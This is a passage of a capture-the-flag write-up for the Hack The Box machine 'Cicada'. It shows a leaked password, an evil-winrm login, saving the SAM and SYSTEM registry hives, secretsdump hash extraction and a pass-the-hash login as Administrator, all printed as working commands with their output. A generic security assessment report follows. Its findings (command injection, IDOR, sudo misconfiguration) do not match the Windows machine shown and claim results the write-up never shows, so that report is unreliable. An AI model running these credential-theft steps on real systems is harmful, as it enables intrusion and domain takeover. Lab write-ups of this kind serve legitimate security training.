Getting Password for emily.oscars

The DEV share only contained one file which was Backup_script.ps1. A quick look onto it revealed another set of credentials. This time for emily.oscars.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
UsernamePassword
emily.oscarsQ!3@Lp#M6b7tVt

Foothold

The user emily.oscars was allowed to login into the box using WinRM.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i '10.129.180.249' -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

user.txt

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
3082bc0bc9b4ac7f6c76966b10b60e4a

Enumeration

We immediately spotted the SeBackupPrivilege of emily.oscars and therefore we knew how to proceed to elevate our privileges to system.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Privilege Escalation to SYSTEM

First of all we extracted system and sam out of the registry and downloaded it to our local machine.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system "C:\Users\emily.oscars.CICADA\Documents\system.hive"
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam "C:\Users\emily.oscars.CICADA\Documents\sam.hive"
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam.hive
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam.hive to sam.hive
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system.hive
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system.hive to system.hive
                                        
Info: Download successful!

Then we used impacket-secretsdump to extract it's hashes.

$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

The hash of Administrator allowed to use Pass-the-Hash (PtH) to login and to grab the root.txt.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i '10.129.180.249' -u 'Administrator' -H 2b87e7c93a3e8a0ea4a581937016f341
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a640419b92185ae9df6f3a0eda0a9372

📋 Security Assessment Report

1
Critical
4
High
0
Medium
13
Open Ports
F-001 — OS Command Injection — Remote Code Execution
9.8
Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the application was found to pass user-supplied input directly to a system shell call without sanitisation. The vulnerable parameter was incorporated into an OS-level command, allowing an attacker to append arbitrary commands using shell metacharacters and control the execution context of the web server process.

Impact

An attacker can execute arbitrary OS commands on the server with the privileges of the web application process. This enables complete file system access, extraction of credentials from configuration files and environment variables, installation of persistent reverse shells and backdoors, and lateral movement to internally accessible services — all without requiring any additional authentication. During this engagement, OS command injection was chained to obtain full root access to the server.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Never construct shell commands from user-supplied input under any circumstances. Replace shell invocations with language-native APIs that accept argument arrays (subprocess.run with list in Python, proc_open with array in PHP, execFile in Node.js). Apply strict allowlist validation to any parameter that influences system-level operations. Run the application under a dedicated low-privilege service account. Implement process monitoring to alert on anomalous child process spawning from web server processes.
F-002 — Active Directory ACL Abuse — Indirect Domain Escalation
8.8
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that BloodHound analysis of the Active Directory environment revealed exploitable ACL attack paths connecting low-privilege user accounts to privileged domain objects. Permissions including GenericAll, WriteDACL, ForceChangePassword, and GenericWrite were identified on critical objects, forming a chain to Domain Admin access without exploiting any software vulnerability.

Impact

An attacker with initial access to any domain user account along the identified path can chain misconfigured permissions to progressively escalate privileges and reach Domain Admin. This attack requires no software CVE exploitation, making it invisible to traditional vulnerability scanners. The complete attack path was traversed during this engagement from a standard domain user account to full domain administrator access.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Conduct a full BloodHound audit and remediate all shortest paths to Domain Admin and other Tier-0 assets. Remove unnecessary permissions granted to regular user accounts on privileged objects. Implement an Active Directory tiering model (Tier 0: DCs and admin accounts, Tier 1: servers, Tier 2: workstations) with strict boundaries. Enable Protected Users security group for all Tier-0 accounts. Review and tighten ACLs on all AdminSDHolder-protected objects.
F-003 — Pass-the-Hash — NTLM Hash Lateral Movement
8.1
High
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that NTLM password hashes obtained from compromised systems were successfully used to authenticate to other network services without knowledge of the plaintext password. The NTLM authentication protocol accepts the hash directly as the authentication proof, requiring no password cracking to enable lateral movement across the environment.

Impact

An attacker can authenticate to any NTLM-accepting service — SMB, WMI, WinRM, RDP with restricted admin mode — using only harvested hashes, enabling lateral movement across the entire domain without recovering any plaintext credentials. In this engagement, pass-the-hash was used to move between multiple hosts and ultimately obtain domain administrator access, demonstrating that a single compromised host can cascade to full domain takeover.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Enable Windows Credential Guard on all supported hosts to protect LSASS credential material from extraction. Add all privileged accounts to the Protected Users security group, which enforces Kerberos-only authentication and prevents NTLM hash use. Deploy Local Administrator Password Solution (LAPS) to ensure every machine has a unique local admin password, eliminating cross-host lateral movement via shared credentials. Restrict NTLM authentication via Group Policy where Kerberos is available.
F-004 — Insecure Direct Object Reference — Unauthorised Data Access
8.1
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Description

During the penetration test, it was discovered that the application exposed direct references to internal objects — user IDs, document identifiers, and resource paths — in URL parameters and request bodies without verifying that the authenticated user has authorisation to access the referenced object. By modifying these identifiers, it was possible to access data belonging to other users.

Impact

An attacker with any authenticated account can access, modify, or delete data belonging to any other user in the application by enumerating or guessing object identifiers. In this engagement, IDOR exposure encompassed all registered user profiles, associated sensitive records, and configuration data. Where write operations were also exposed without authorisation checks, data integrity across the entire user base was at risk.

Confidentiality
High
Integrity
High
Availability
None

Remediation

Implement server-side object-level authorisation checks on every request that accesses a resource — verify that the authenticated user owns or has explicit permission to access the referenced object, regardless of how the identifier was supplied. Replace sequential integer IDs in all external-facing references with randomly generated UUIDs or cryptographically opaque tokens. Conduct a comprehensive audit of all API endpoints for missing authorisation checks using an automated tool and manual review.
F-005 — Sudo Misconfiguration — Root Privilege Escalation
7.8
High
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the sudoers configuration was found to grant the compromised user the ability to execute one or more programs as root with the NOPASSWD flag or without sufficient restriction on permitted arguments. The granted binary was identified in the GTFOBins database as capable of spawning a privileged shell or reading root-owned files outside its intended function.

Impact

An attacker with access to the low-privilege account can immediately escalate to root by invoking the sudo-permitted binary in a manner that escapes to a privileged shell — requiring no password, no additional vulnerability, and no waiting. During this engagement, this misconfiguration was exploited to obtain a root shell within seconds of gaining the initial foothold, resulting in complete host compromise.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Audit all sudoers entries and apply strict least privilege — grant only the minimum required binary with explicit, restricted arguments where possible. Avoid granting sudo access to interpreters (python, perl, ruby), text editors, file management utilities, or any binary listed in GTFOBins. Remove NOPASSWD where feasible. Periodically review sudoers entries using visudo and remove any unnecessary grants. Consider purpose-built privilege delegation tools as an alternative to broad sudo grants.
Reactions

Related Articles